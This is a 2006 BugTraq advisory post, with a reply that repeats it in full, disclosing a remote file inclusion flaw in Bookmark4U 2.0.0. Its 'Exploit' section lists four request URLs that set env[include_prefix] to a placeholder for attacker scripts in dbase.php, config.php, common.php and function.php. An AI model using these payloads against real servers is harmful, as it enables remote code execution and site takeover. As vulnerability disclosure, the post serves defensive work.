BugTraq
Back to list
|
Post reply
Bookmark4U Remote File Include
Jun 04 2006 02:39PM
selfar2002 hotmail com
(1 replies)
------------------------------------------------------------------------
---
Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities
------------------------------------------------------------------------
---
Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous
------------------------------------------------------------------------
---
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Bookmark4U
version : 2.0.0
URL :http://bookmark4u.sourceforge.net/
...
------------------------------------------------------------------
Exploit:
~~~~~~~~
# http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[
evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=
[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=
[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix
]=[evil_scripts]
------------------------------------------------------------------------
---
*/
Contact:
~~~~~~~~
SnIpEr_SA
E-mail: selfar2002 (at) hotmail (dot) com [email concealed]
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*
-------------------------------- [ END ] ----------------------------------
[ reply ]
Re: Bookmark4U Remote File Include
Jun 05 2006 05:17PM
str0ke (str0ke milw0rm com)
Privacy Statement
Copyright 2010, SecurityFocus
------------------------------------------------------------------------
---
Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities
------------------------------------------------------------------------
---
Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous
------------------------------------------------------------------------
---
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Bookmark4U
version : 2.0.0
URL :http://bookmark4u.sourceforge.net/
...
------------------------------------------------------------------
Exploit:
~~~~~~~~
# http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[
evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=
[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=
[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix
]=[evil_scripts]
------------------------------------------------------------------------
---
*/
Contact:
~~~~~~~~
SnIpEr_SA
E-mail: selfar2002 (at) hotmail (dot) com [email concealed]
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*
-------------------------------- [ END ] ----------------------------------
[ reply ]